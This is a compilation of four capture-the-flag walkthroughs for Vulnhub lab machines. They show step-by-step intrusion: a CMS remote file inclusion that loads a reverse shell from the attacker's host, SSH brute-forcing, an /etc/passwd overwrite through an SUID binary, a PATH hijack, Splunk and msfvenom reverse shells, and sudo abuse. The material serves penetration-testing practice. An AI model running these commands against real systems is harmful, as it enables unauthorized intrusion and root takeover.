digitalworld.local-BRAVERY: Vulnhub Walkthrough

Today we will be solving a boot2root lab from Vulnhub called SILKY-1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Download it from here: https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

Penetration Methodologies

Scanning

·         Netdiscover

·         Nmap

Enumeration

·         Mount NFS share directory

·         SMB shared file enumeration

Exploiting

·         Abusing CMS via RFI

·         Obtaining reverse shell via netcat

Privilege Escalation

·         Abusing SUID binary

·         Catpure the Flag

Walkthrough

Scanning

Let’s start with network scanning to identify IP of VM with the help of netdiscover.

So we have our target IP 192.168.1.105 now, let's scan service and ports via nmap.

nmap -A 192.168.1.105

We got fruitful result from nmap scan as we saw so many services were running on various port.

Enumeration

As we found network share service is available via port 2049, so we though to check shared directory in the network. We have therefore installed NFS-client on our local mschine and have a command to identify the shared directory available to mount on our local computer.

showmount -e 192.168.1.105

we found /var/nfshare is shared directory that we can mount in our local machine as given below:

mkdir /tmp/raj

mount -t nfs 192.168.1.105:/var/nsfshare /tmp/raj

cd /tmp/raj

ls

cat discovery

cat enumeration

cat explore

cat password.txt

cat qwertyuioplkjhgfdsazxcvbnm

Hmmm!!! After exploring all files, we concluded that “qwertyuioplkjhgfdsazxcvbnm” could be the password.

Because port 445 is also available for SMB, even we have also obtained a password recently thus we can try connecting to SMB to list shared folders for SMB. But first we need to enumerate share SMB shared directory and for that we can go with Enum4linux.

enum4linux 192.168.1.105

As you can observe, enum4linux showed two shared folders: anonymous and secured. And we can access them with help of smb-client.

smbclient //192.168.1.105/anonymous

password: qwertyuioplkjhgfdsazxcvbnm

We have successfully accessed the shared folder, where I have seen some user’s folders. But while doing an internal recon, I didn't notice any interesting clues.

So, I'm moving to another "secured" folder and here I found three files, which I downloaded on my local computer.

smb-clinet //192.168.1.105/secured -U David

password: qwertyuioplkjhgfdsazxcvbnm

get david.txt

get genevieve.txt

get README.txt

Then, each file opened, and some helpful URLs were found, we're going to navigate them one by one, moreover the last line was pitching for any CMS login.

Initially, we looked at the URL given below but that was no use to us.

https://192.168.1.105/devlopmentsecretpage

We then explored another URL and found no useful stuff here, too.

https://192.168.1.105/devops/devlopmentsecretpagev1.php

We move to the third and final URL found from the genevieve.txt. Fortunately, I found the following webpage differing from two previous results and it could have been CMS.

I found a Cuppa CMS login page by exploring other tabs. This might be a turning point as we are attempting to exploit CMS cuppa.

Exploiting

I dig out cuppa exploit from inside the searchplot without wasting time and the CMS is vulnerable to LFI/RFI.

Thus, I found a Remote Inclusion File URL when I checked the POC. We now have to be prepared a reverse shell for exploitation of RFI.

Therefore, I used php-reverse-shell from inside /usr/share/webshell/php and modified the listening IP with Kali’s IP then launch Python HTTP server for file transferring and start netcat listener on listening port.

When everything is ready! Just trigger the following URL to exploit RFI.

http://192.168.1.105/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.1.110:8000/shell.php?

We'll get a netcat session for the victim's machine as soon as we trigger the URL. Now we have a low privilege shell and we need to enhance privilege in order to achieve a higher privilege shell. Therefore, to find SUID enable binaries, I run following command.

find / -perm -u=s -type f 2>/dev/null

Hmmm! So here I notice cp (copy command) has SUID permission that means I can copy any file as root. Now let’s try to escalate the privilege by exploiting SUID enable binary by copying our edited /etc/passwd file inside victim’s machine.

Privilege Escalation

Suppose I would like to create a new user (raj) with root privilege inside /etc/password file of victim’s machine. So first we need to copy the content of /etc/passwd file in a text file inside our local machine and then with the help of openssl generates the salt password for user raj and then copy the salt value.

Now open the text file where you have pasted the content of /etc/passwd of victim’s machine and add a new row for user raj along with the salt value that we have generated. Named the file as passwd and transfer this file into victim machine, so that we can replace our /etc/passwd file with original /etc/passwd file of the VM.

For downloading /etc/passwd file into Victim’s machine, execute the following command and get the root access to grab the flag.

cd /tmp

wget http://192.168.1.110:8000/passwd

 cp passwd /etc/passwd

su raj

cd /root

ls

cat proof.txt

Vulnhub Walkthrough: uknowndevice64 v2.0

Today we are going to take on another boot2root challenge “uknowndevice64 v2.0” by Ajay Verma. Our goal is to get root and read flag.txt with at least two different ways.

Download it from here :https://download.vulnhub.com/unknowndevice64/unknowndevice64-V2.0.ova

Difficulty: Beginner

Penetrating Methodology:

Scanning

• Netdiscover
• NMAP

Enumeration

• Web Directory search 
• Credential harvesting

Exploiting

• SSH login (1^st Method)
• ADB login (2^nd Method)

Privilege Escalation

• Exploit sudo rights

Capture the Flag

Walkthrough

Scanning:

Let’s start off by scanning the network and identifying host IPs. We can identify our host IP as 192.168.1.22 by using netdiscover. Next, we have to scan this IP using nmap.
netdiscover
nmap -p- -A 192.168.1.22

The result shows that freeciv is running on port 5555, ssh is running on port 6465 and netbus is running on 12345.

First, we try to open the IP into browser with port 12345 we were prompted to login. So, we tried the basic credentials with different combinations and got succeeded with ‘Administrator’ as username and password as ‘password’.

After logging in, a webpage appeared as you can see here. But nothing of our use. 

Then tried to access robots.txt file. We got lucky and found a file here named ‘./info.php’ inside it.   

When we opened this in browser, we are prompted to download it.

When we open this downloaded file, we got a SSH private key inside it. So, we copied the text from “BEGIN RSA PRIVATE KEY” to “END RSA PRIVATE KEY” and saved it in a file named ‘sshkey’. Besides this key we can see “unkn0wnd3vic3-64” at the end of the file, lets save this as of now.   

Here first we have changed permission for the file ‘sshkey’. Then login into ssh using this file on port 6465(as ssh is running on port 6465). And we are asked to enter a passphrase for this ssh key.so we used the text “unkn0wnd3vic3-64” that we saved from info.php and it worked. After that we switched as root user and listed the content of root.

chmod 600 sshkey

ssh -I sshkey 192.168.1.122 -p 6465

su root

ls

We spotted a directory named ‘system’ and inside system we found a file ‘flag.txt’. This is our flag!    

Another way

We will be using previously gained information to save time. As we knew from Nmap scan that freeciv is running on port 5555 so tried to connect it with adb. After getting shell, we switched to root and captured the flag (as we already knew flag is inside flag.txt within system directory).

abd connect 192.168.1.22:5555

abd shell

su root

cat system/flag.txt

Finally!! The challenge is completed, and we have grabbed the flag.txt file using two different approach.

Silky-CTF: 0x01: Vulnhub Walkthrough

Today we will be solving a boot2root lab from Vulnhub called SILKY-1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Download it from here: https://www.vulnhub.com/series/silky-ctf,207/

Level : Easy-Intermidate

Task: Boot to Root (flag.txt)

Penetration Methodologies

Scanning

·         Netdiscover

·         Nmap

Enumeration

·         Web Spreading

·         Robots.txt

·         Generating Password Dictionary (Crunch)

Exploit

·         Brute force attack (Hydra)

·         SSH Login

Identify SUID Enable Binaries

·         Privilege Escalation

·         Exploit PATH Variable

Capture the flag

WALKTHROUGH

Scanning

We start by scanning the network for targets using Netdiscover.

netdiscover

So we found target IP 192.168.1.106 and proceed by running a Nmap scan for all its ports to see what we can find.

nmap  -A 192.168.1.106

Since port 8080 is running HTTP-proxy, so our obvious choice is to browse Target’s IP in the browser but didn’t found any hint.

Enumeration

We checked the robots.txt file for the results of nmap and showed /notes.txt as our next indication.

So, we found a text message that is written in German when we explored the notes.txt file.

With the help of Google translator, I translate the German message, which was connected to password hint:

“I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still.”

Then again, I visit the home page to view its source code and found a link for script.js

So, I found the word: s1lKy when navigate to /script.js as shown below.  Hmmm!!! This word s1lKy could be the possible password as said in the above text message.

So, without wasting time I decided to generate a dictionary with the help of crunch. As per the text message last 2 character are missing. But these 2 characters could be any combination such as alpha-alpha, alpha-ALPHA, alph-numeric, alpha-special character or vice-versa and so on.

And after spending almost one-an-hour I successfully found the valid combination for ssh login as port 22 is opened.

crunch 7 7 -t s1lky^% >> pass.txt

Exploit

Assuming username could be silky, and password could be in pass.txt, I lunched brute force attack using hydra on port 22 for identifying valid combination of ssh login.

hydra -l silky -P pass.txt 192.168.1.106 ssh

Since we found silky:s1lky#5 as username and password for ssh login, now its was time to access ssh shell and escalated the root privilege to capture the flag.

ssh silky@192.168.1.106

Once I logged in successfully then without wasting much time, I looked for SUID enabled binaries and here /usr/bin/sky looks interesting.

find / -perm -u=s -type f 2>/dev/null

Although when I run this program it shown “root” in its output as result along with some German text. To analysis its result I try to inspect the program script with the help of strings which a command line utility to identify file type.

stings /usr/bin/sky

Hmm!! the information I found through strings was that, this program is executing to commands simultaneously. First echo command to show the German text message and another whoami.

Privilege Escalation

To escalated root privilege, we can abuse PATH Variable as shown below and for more detail read complete article from here.

echo ‘/bin/sh’ > whoami

chmod 777 whoami

export PATH=/tmp:$PATH

/usr/bin/sky

OKAY!! We got another shell which is a root shell as shown below, let’s now grab the flag.txt file and complete the challenge.

id

cd /root

flag.txt

Sputnik 1: Vulnhub Walkthrough

Today we will be solving a boot2root lab from Vulnhub called Sputnick:1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Level: Easy

Task: To find flag.txt

Table of Content

Scanning 

·         Open ports and Running services (Nmap)

Enumeration 

·         Web Directory search 

·         Credential harvesting

Exploitation 

·         Splunk reverse and bind shell

·         Python reverse shell

·         Accessing shell

Privilege Escalation

·         Capture flag.txt

Scanning

We start by scanning the network for targets using Netdiscover

netdiscover

So we found target IP 192.168.1.103 and proceed by running a Nmap scan for all its ports to see what we can find.

nmap -p- -A 192.168.1.103

Enumeration

The scan shows us we have port 8089, 8191, 55555 and 61337 open. Port 55555 has an associated IP address and a directory link for git respository; we investigate it to see what we can find. We copy and paste it into our browser.

We access the “Logs” directory and click on the “HEAD” file within.

There is a link for a Git page, we go to the link and find Flappy. Git clone is used to clone and download the file to our system for further investigation.

Once the file in downloaded we explore its contents but nothing stands out, so we access their logs.

git clone https://github.com/ameerpornillos/flappy

git log

We see that the command gave us the logs for our file and the search starts. We focus on the commit’s and start searching through them.

Finally, we come across the highlighted commit and strike gold!

We use the “ls-tree” to get an indented listing of the file.

The screenshot shows a file named “secret”; we used the git show command on it’s string to see what is reveals

git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717   

git show f4385198ce1cab56e0b2a1c55e8863040045b085

Now what could this be? We recalled seeing a Splunk service running on port 61337, we accessed it on our browser to find a login screen for Splunk.

192.168.1.103:61337

EXPLOITATION (SPLUNK)

The information we got earlier from the previous screenshot are in fact login credentials. The username is “sputnik” and the password is “ameer_says_thank_you_and_god_job”, we enter these and are able to get into the Splunk account.

We looked around for a while and then decided to upload a shell to the account. On searching we found a way to weaponize splunk with reverse and bind shell from https://github.com/TBGSecurity/splunk_shells

The .gz file from the link was saved on our system, we navigate to the “App: Search & Reporting” option and click on “Search & Reporting”

Click on the “Install app from file” option.

Using the browse option, we find our shell, select it and upload it.

Click on the “Restart Now” to restart the application.

We scroll down to find our shell file as shown below. Before we can run, it we need to click on the “Permissions” option to change its permissions.

Configuration files need to be added in order to run the shell successfully, here we set permission to everyone  and at the bottom we click on the “All apps” radio button and save this change.

Now to execute the shell. We navigate to the search option in Splunk and type in our command defining that we want a reverse shell of standard type to talk to out attach machines IP on the listening port.

| revshell std 192.168.1.110 1234

Access Victim’s Shell

Netcat is running on our machine listening on port 1234 and see shell talking back.

The “id” command was used to no avail so we decided to step it up a notch.

nc -lvp 1234

We used Msfvenom to create a python payload.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.110 lport=4444 R

The payload is uploaded through our existing Netcat session, all that needed to be done was the payload to be pasted into the terminal and executed.

nc -lvp 1234

A new Netcat session is started on the port (4444) that we defined in our payload and we see the execution occur flawlessly.

Privilege Escalation

We run “id” command to see that our user is “splunk”.

Time privilege escalation. On the splunk prompt we first run the “sudo -l” command and enter the password that we used earlier to log into Splunk “ameer_says_thank_you_and_good_job” where we found splunk user can ed as root.

So close to root! Now all we have to do is run the “sudo ed” command and then the “!/bin/sh” command. Type in “id” and there you go! We have root!

Id

Sudo -l

ameer_says_thank_you_and_good_job

sudo ed

!/bin/sh

Time to look for our flag.

We look in the root directory to find “flag.txt” and use “cat” to open it. Hooray for us!

As always, we at Hacking Articles hope you enjoy this lab and share it with your collogues. This lab has a great feature that gives you an insight into exploiting Splunk. Overall the lab is easy and the level of frustration it might induce is minimal.

Have fun and stay ethical.